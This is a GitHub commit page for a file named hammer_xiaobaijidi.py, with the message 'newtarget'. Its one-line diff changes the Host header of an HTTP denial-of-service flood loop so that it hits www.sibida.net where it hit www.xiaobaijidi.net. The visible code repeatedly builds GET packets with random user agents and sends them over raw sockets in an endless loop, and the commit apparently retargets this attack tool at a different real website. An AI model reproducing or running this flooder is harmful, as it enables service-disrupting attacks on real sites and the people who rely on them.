Skip to content

Commit

Permalink
newtarget
Browse files Browse the repository at this point in the history
  • Loading branch information
TommyJerryMairo committed Nov 17, 2015
1 parent ef9f843 commit 3724c5c
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion hammer_xiaobaijidi.py
Original file line number Diff line number Diff line change
Expand Up @@ -44,7 +44,7 @@ def bot_hammering(url):
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+"www.xiaobaijidi.net"+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
packet = str("GET / HTTP/1.1\nHost: "+"www.sibida.net"+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
Expand Down

0 comments on commit 3724c5c

Please sign in to comment.